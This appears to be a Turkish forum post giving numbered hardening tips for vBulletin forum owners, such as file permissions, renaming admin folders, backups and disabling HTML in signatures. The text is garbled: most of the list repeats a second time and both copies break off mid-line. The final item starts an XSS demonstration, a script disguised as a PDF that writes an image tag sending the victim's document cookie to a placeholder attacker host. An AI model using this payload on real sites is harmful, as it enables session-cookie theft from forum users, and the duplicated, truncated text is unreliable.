1- İLk olarak her zaman için forumunuzu son çıkan vbulletin sürümüne upgrade edin daha güvenlidir.
2-Herhangi bi eklentide php dosyası veya php dosyalarında editleme varsa iyice dikkat edin sonradan açık teşkil edebilir.
3-Ftp nize girin ve tüm dosyalarının chmod değerlerinin 777 olmamasına
dikkat edin çünkü fso ile serverınıza girilirse hacklenmeyin adam yazma
hakkı bulamaz kurtulmuş olursunuz.
4- Config.php dosyanızı mutlaka kriptolayınki herhangi bi fso ile girildiğinde sql bağlantı için kimse okuyamasın.
5- Eğer phpmyadmin kullanıyorsanız phpmyadmin adresinizin şifreli olduğundan emin olun değilse şifreleyin.
6- Admincp ve modcp klasörlerinizin ismini değiştirin vede şifreleyin o klasörleri.
7-Çok basit şifreler kullanmayın şifrelerinizde &%+/ gibi özel karekterlerin olmasına özen gösterin
8-Trojen yerseniz mutlaka hemen format atın ve tüm ftp +panel v.s şifrelerinizi değiştirin
9-Forumu kurduktan sonra mutlaka install klasörünü silin sadece
install.php yi değil zaten herhangi bir işlevi olmıyan klasör komple
silin ileriki zamanlarda açık teşkil etmesin.
10-Mutlaka hergün sitenizin yedeğini alın herhangi bi sorunla
karşılaşırsanız yedeği geri yükleyip ufak bir zararla atlatırsınız.
11- Calender(Takvim) i silin biri oraya Hacked by ****** gibisinden bişeyler ekliyerek lamerlik yapabilir.
12-Shoutbox kullanıyorsanız mutlaka html ve images ları kapatın bunlar açık teşkil ediyorlar.
13-Eğer yedeği ftp nize yollayıp ordan bilgisayarınıza çekiyorsanız
yedek aldıktan sonra mutlaka ftp nizden silin çünkü yedek alınması için
klasörün chmod u 777 dir ve isteyen herkez yedeği bilgisayarına
indirebilir.
14- imzada html kodlarını kapatın bu yöntemle xss veya yönlendirme yapılabilir.
15- Üye olurken mutlaka resim doğrulaması olsun eğer hostunuzdan doğan
bir image sorunu varsa herhangi zorunlu bir ek bilgi ekleyinki siteniz
flood saldırısına maruz kalmasın.
16- Herhangi bi konuda TIKLA gibisinden yazılara direk tıklamayın önce
sağ tıklayıp özelliklerden linke bakın ondan sonra tıklayın.
17-Özel mesajlarda çok özelliğin açık olmasına gerek yok
cookieslerinizin güvenliği açısından özel mesajdaki özellikleri kapatın
image v.s
18-Yeni kullanıcı grup eklerken bu uye grubu halka acık olsunmu
seçeneğini mutlaka hayır yapın diğer kullanıcılar bu grubu seçemesin.
19-Eğer null sürüm kullanıyorsanız dosyalara dikkat edin null iyen kişi
sizin bilgilerinize ulaşmak için açık kapı bırakmış olabilir ör: 3.5.3
sürümündeki sm-check.php dosyası.
20-eğer topx kullanıyor kullanıyorsanız yönlendirme yemediğinden emin olun herhangi biri indexine yönlendirebilir http://www.spyfunclub.org/kod.txt
örneğin burdaki kod o yüzden eğer topx iniz yönlendirme yiyosa
yönlendirme kodundaki kelimeleri sansürleyin vede en garanti yol olarak
açıksız topx ler var onu kullanın
21-Eğer toplistinizi eklenti olarak kullanıyosanız ör:http://www.spyfunclub.org/toplist.php html kodlarının kapalı olmasına dikkat edin çünkü yönlendirme koduyla indexe yönlendirilebilir.
22- Gelelim eklentiden doğan xss açığına
Notepad ile yeni bir dosya açıp aşağıdaki kodu içine yapıştırın ve testmagic.pdf olarak kaydedin.
Code:
<script>
d o c u m e n t.write('<img src="http://host adresiniz/c.php?c='+document
2-Herhangi bi eklentide php dosyası veya php dosyalarında editleme varsa iyice dikkat edin sonradan açık teşkil edebilir.
3-Ftp nize girin ve tüm dosyalarının chmod değerlerinin 777 olmamasına
dikkat edin çünkü fso ile serverınıza girilirse hacklenmeyin adam yazma
hakkı bulamaz kurtulmuş olursunuz.
4- Config.php dosyanızı mutlaka kriptolayınki herhangi bi fso ile girildiğinde sql bağlantı için kimse okuyamasın.
5- Eğer phpmyadmin kullanıyorsanız phpmyadmin adresinizin şifreli olduğundan emin olun değilse şifreleyin.
6- Admincp ve modcp klasörlerinizin ismini değiştirin vede şifreleyin o klasörleri.
7-Çok basit şifreler kullanmayın şifrelerinizde &%+/ gibi özel karekterlerin olmasına özen gösterin
8-Trojen yerseniz mutlaka hemen format atın ve tüm ftp +panel v.s şifrelerinizi değiştirin
9-Forumu kurduktan sonra mutlaka install klasörünü silin sadece
install.php yi değil zaten herhangi bir işlevi olmıyan klasör komple
silin ileriki zamanlarda açık teşkil etmesin.
10-Mutlaka hergün sitenizin yedeğini alın herhangi bi sorunla
karşılaşırsanız yedeği geri yükleyip ufak bir zararla atlatırsınız.
11- Calender(Takvim) i silin biri oraya Hacked by ****** gibisinden bişeyler ekliyerek lamerlik yapabilir.
12-Shoutbox kullanıyorsanız mutlaka html ve images ları kapatın bunlar açık teşkil ediyorlar.
13-Eğer yedeği ftp nize yollayıp ordan bilgisayarınıza çekiyorsanız
yedek aldıktan sonra mutlaka ftp nizden silin çünkü yedek alınması için
klasörün chmod u 777 dir ve isteyen herkez yedeği bilgisayarına
indirebilir.
14- imzada html kodlarını kapatın bu yöntemle xss veya yönlendirme yapılabilir.
15- Üye olurken mutlaka resim doğrulaması olsun eğer hostunuzdan doğan
bir image sorunu varsa herhangi zorunlu bir ek bilgi ekleyinki siteniz
flood saldırısına maruz kalmasın.
16- Herhangi bi konuda TIKLA gibisinden yazılara direk tıklamayın önce
sağ tıklayıp özelliklerden linke bakın ondan sonra tıklayın.
17-Özel mesajlarda çok özelliğin açık olmasına gerek yok
cookieslerinizin güvenliği açısından özel mesajdaki özellikleri kapatın
image v.s
18-Yeni kullanıcı grup eklerken bu uye grubu halka acık olsunmu
seçeneğini mutlaka hayır yapın diğer kullanıcılar bu grubu seçemesin.
19-Eğer null sürüm kullanıyorsanız dosyalara dikkat edin null iyen kişi
sizin bilgilerinize ulaşmak için açık kapı bırakmış olabilir ör: 3.5.3
sürümündeki sm-check.php dosyası.
20-eğer topx kullanıyor kullanıyorsanız yönlendirme yemediğinden emin olun herhangi biri indexine yönlendirebilir http://www.spyfunclub.org/kod.txt
örneğin burdaki kod o yüzden eğer topx iniz yönlendirme yiyosa
yönlendirme kodundaki kelimeleri sansürleyin vede en garanti yol olarak
açıksız topx ler var onu kullanın
21-Eğer toplistinizi eklenti olarak kullanıyosanız ör:http://www.spyfunclub.org/toplist.php html kodlarının kapalı olmasına dikkat edin çünkü yönlendirme koduyla indexe yönlendirilebilir.
22- Gelelim eklentiden doğan xss açığına
Notepad ile yeni bir dosya açıp aşağıdaki kodu içine yapıştırın ve testmagic.pdf olarak kaydedin.
Code:
<script>
d o c u m e n t.write('<img src="http://host adresiniz/c.php?c='+document